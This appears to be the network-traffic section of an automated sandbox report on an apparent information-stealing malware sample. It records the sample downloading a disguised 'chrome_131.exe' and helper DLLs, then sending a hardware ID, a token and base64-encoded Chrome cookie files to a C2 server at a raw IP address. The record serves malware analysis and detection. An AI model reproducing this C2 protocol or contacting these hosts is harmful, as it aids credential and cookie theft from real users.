1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 31 Oct 2024 16:12:22 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "6dde8-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 31 Oct 2024 16:12:23 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "1f3950-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 31 Oct 2024 16:12:26 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "3ef50-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 31 Oct 2024 16:12:26 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "13bf0-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                    Source: global trafficHTTP traffic detected: GET /adjunts/chrome_131.exe HTTP/1.1Host: osteo9.esalnuvol.comCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.235.128.16Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST /562c1eb14955c897.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CAFHDBGHJKFIDHJJJEBKHost: 185.235.128.16Content-Length: 217Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 41 46 48 44 42 47 48 4a 4b 46 49 44 48 4a 4a 4a 45 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 30 35 36 46 30 45 34 31 30 37 42 31 39 35 33 34 34 38 30 31 39 0d 0a 2d 2d 2d 2d 2d 2d 43 41 46 48 44 42 47 48 4a 4b 46 49 44 48 4a 4a 4a 45 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 4c 6f 67 73 44 69 6c 6c 65 72 0d 0a 2d 2d 2d 2d 2d 2d 43 41 46 48 44 42 47 48 4a 4b 46 49 44 48 4a 4a 4a 45 42 4b 2d 2d 0d 0a Data Ascii: ------CAFHDBGHJKFIDHJJJEBKContent-Disposition: form-data; name="hwid"7056F0E4107B1953448019------CAFHDBGHJKFIDHJJJEBKContent-Disposition: form-data; name="build"LogsDiller------CAFHDBGHJKFIDHJJJEBK--
                    Source: global trafficHTTP traffic detected: POST /562c1eb14955c897.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KFCFBAAEHCFHJJKEHJKJHost: 185.235.128.16Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 46 43 46 42 41 41 45 48 43 46 48 4a 4a 4b 45 48 4a 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 65 36 32 30 64 61 65 65 31 39 35 32 36 35 36 37 37 65 30 30 65 31 63 61 39 61 64 33 66 38 39 39 31 31 35 38 62 35 35 64 36 31 34 39 64 64 34 34 37 33 39 65 63 63 62 62 61 62 31 31 37 39 64 62 36 37 62 61 62 62 36 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 43 46 42 41 41 45 48 43 46 48 4a 4a 4b 45 48 4a 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 43 46 42 41 41 45 48 43 46 48 4a 4a 4b 45 48 4a 4b 4a 2d 2d 0d 0a Data Ascii: ------KFCFBAAEHCFHJJKEHJKJContent-Disposition: form-data; name="token"1e620daee195265677e00e1ca9ad3f8991158b55d6149dd44739eccbbab1179db67babb6------KFCFBAAEHCFHJJKEHJKJContent-Disposition: form-data; name="message"browsers------KFCFBAAEHCFHJJKEHJKJ--
                    Source: global trafficHTTP traffic detected: POST /562c1eb14955c897.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDBFHDHJKKJDHJJJJKEGHost: 185.235.128.16Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 44 42 46 48 44 48 4a 4b 4b 4a 44 48 4a 4a 4a 4a 4b 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 65 36 32 30 64 61 65 65 31 39 35 32 36 35 36 37 37 65 30 30 65 31 63 61 39 61 64 33 66 38 39 39 31 31 35 38 62 35 35 64 36 31 34 39 64 64 34 34 37 33 39 65 63 63 62 62 61 62 31 31 37 39 64 62 36 37 62 61 62 62 36 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 46 48 44 48 4a 4b 4b 4a 44 48 4a 4a 4a 4a 4b 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 46 48 44 48 4a 4b 4b 4a 44 48 4a 4a 4a 4a 4b 45 47 2d 2d 0d 0a Data Ascii: ------GDBFHDHJKKJDHJJJJKEGContent-Disposition: form-data; name="token"1e620daee195265677e00e1ca9ad3f8991158b55d6149dd44739eccbbab1179db67babb6------GDBFHDHJKKJDHJJJJKEGContent-Disposition: form-data; name="message"plugins------GDBFHDHJKKJDHJJJJKEG--
                    Source: global trafficHTTP traffic detected: POST /562c1eb14955c897.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGCFBGDHJKFIEBFIECGHHost: 185.235.128.16Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 47 43 46 42 47 44 48 4a 4b 46 49 45 42 46 49 45 43 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 65 36 32 30 64 61 65 65 31 39 35 32 36 35 36 37 37 65 30 30 65 31 63 61 39 61 64 33 66 38 39 39 31 31 35 38 62 35 35 64 36 31 34 39 64 64 34 34 37 33 39 65 63 63 62 62 61 62 31 31 37 39 64 62 36 37 62 61 62 62 36 0d 0a 2d 2d 2d 2d 2d 2d 42 47 43 46 42 47 44 48 4a 4b 46 49 45 42 46 49 45 43 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 42 47 43 46 42 47 44 48 4a 4b 46 49 45 42 46 49 45 43 47 48 2d 2d 0d 0a Data Ascii: ------BGCFBGDHJKFIEBFIECGHContent-Disposition: form-data; name="token"1e620daee195265677e00e1ca9ad3f8991158b55d6149dd44739eccbbab1179db67babb6------BGCFBGDHJKFIEBFIECGHContent-Disposition: form-data; name="message"fplugins------BGCFBGDHJKFIEBFIECGH--
                    Source: global trafficHTTP traffic detected: POST /562c1eb14955c897.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JEBKJDAFHJDGDHJKKEGIHost: 185.235.128.16Content-Length: 6651Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /4bdcdc3545a160aa/sqlite3.dll HTTP/1.1Host: 185.235.128.16Cache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST /562c1eb14955c897.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGCGHCBKFCFBFHIDHDBFHost: 185.235.128.16Content-Length: 427Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 47 43 47 48 43 42 4b 46 43 46 42 46 48 49 44 48 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 65 36 32 30 64 61 65 65 31 39 35 32 36 35 36 37 37 65 30 30 65 31 63 61 39 61 64 33 66 38 39 39 31 31 35 38 62 35 35 64 36 31 34 39 64 64 34 34 37 33 39 65 63 63 62 62 61 62 31 31 37 39 64 62 36 37 62 61 62 62 36 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 47 48 43 42 4b 46 43 46 42 46 48 49 44 48 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 47 48 43 42 4b 46 43 46 42 46 48 49 44 48 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 65 79 4a 70 5a 43 49 36 4d 53 77 69 63 6d 56 7a 64 57 78 30 49 6a 70 37 49 6d 4e 76 62 32 74 70 5a 58 4d 69 4f 6c 74 64 66 58 30 3d 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 47 48 43 42 4b 46 43 46 42 46 48 49 44 48 44 42 46 2d 2d 0d 0a Data Ascii: ------EGCGHCBKFCFBFHIDHDBFContent-Disposition: form-data; name="token"1e620daee195265677e00e1ca9ad3f8991158b55d6149dd44739eccbbab1179db67babb6------EGCGHCBKFCFBFHIDHDBFContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------EGCGHCBKFCFBFHIDHDBFContent-Disposition: form-data; name="file"eyJpZCI6MSwicmVzdWx0Ijp7ImNvb2tpZXMiOltdfX0=------EGCGHCBKFCFBFHIDHDBF--
                    Source: global trafficHTTP traffic detected: POST /562c1eb14955c897.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HJJKJJDHCGCAECAAECFHHost: 185.235.128.16Content-Length: 1451Connection: Keep-AliveCache-Control: no-cache
